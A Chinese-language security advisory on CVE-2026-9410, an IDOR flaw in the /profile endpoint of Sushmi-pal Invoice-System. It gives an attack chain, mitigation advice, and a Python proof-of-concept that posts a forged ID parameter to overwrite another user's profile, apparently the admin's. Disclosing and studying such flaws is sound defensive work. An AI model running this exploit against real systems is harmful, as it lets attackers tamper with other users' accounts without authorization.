IPBUF安全漏洞报告
English
CVE-2026-9410 CVSS 4.3 中危

CVE-2026-9410 Sushmi-pal Invoice-System越权漏洞

披露日期: 2026-05-25

漏洞信息

漏洞编号
CVE-2026-9410
漏洞类型
越权访问
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Sushmi-pal Invoice-System

相关标签

越权访问IDORSushmi-pal Invoice-SystemCVE-2026-9410逻辑漏洞

漏洞概述

Sushmi-pal Invoice-System在特定提交版本前存在越权访问漏洞。该漏洞源于/profile组件的Profile Workflow中,对参数ID的验证存在缺陷。攻击者仅需低权限账号即可通过网络远程利用此漏洞,绕过授权机制修改或访问其他用户的数据。由于采用滚动发布模式,具体受影响版本号未明确,但受影响代码commit为a0a3faa。目前厂商尚未回应,漏洞利用代码已公开。

技术细节

该漏洞属于典型的业务逻辑越权漏洞(IDOR)。在Sushmi-pal Invoice-System的/profile接口处理逻辑中,系统未对传入的“ID”参数进行严格的归属权校验。当低权限用户发起请求时,通过篡改HTTP请求中的ID参数为其他用户的ID值,服务器端错误地信任了该输入,导致攻击者能够执行针对目标用户的操作。虽然攻击需要低权限(PR:L),但无需用户交互(UI:N),且攻击复杂度低(AC:L)。根据CVSS向量分析,该漏洞主要影响数据完整性(I:L),可能导致非授权的数据篡改。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标系统为Sushmi-pal Invoice-System,并注册一个低权限用户账号。
STEP 2
2. 建立会话
攻击者使用低权限账号登录系统,获取有效的Session Cookie或Token。
STEP 3
3. 漏洞利用
攻击者向/profile接口发送POST请求,并在请求体中将ID参数修改为目标用户(如管理员)的ID。
STEP 4
4. 权限提升/数据篡改
服务器未校验ID归属,直接执行了修改操作,导致攻击者篡改了目标用户的资料信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://vulnerable-host/profile" # Attacker's session (Low privilege required) attacker_cookies = { "PHPSESSID": "low_privilege_session_id_here", "user_token": "valid_token_here" } # Vulnerability Payload: Manipulating the 'ID' parameter # to modify another user's profile (e.g., ID 1 = Admin) exploit_data = { "ID": "1", "username": "admin_hacked", "email": "[email protected]" } try: print("[*] Attempting to exploit IDOR vulnerability...") response = requests.post(target_url, data=exploit_data, cookies=attacker_cookies) if response.status_code == 200 and "success" in response.text.lower(): print("[+] Exploit successful! Profile updated for User ID 1.") else: print("[-] Exploit failed or patch applied.") print("Response:", response.text[:200]) except Exception as e: print(f"[!] Error: {e}")

影响范围

Sushmi-pal Invoice-System <= commit a0a3faa16dee2621b231ae227333f5761607283b

防御指南

临时缓解措施
由于厂商尚未响应,建议暂时通过Web应用防火墙(WAF)添加规则,检测并阻止针对/profile接口的异常ID参数篡改请求。管理员应定期审查系统日志,关注是否存在用户资料被非授权修改的情况。若业务允许,可暂时下线Profile功能模块以降低风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表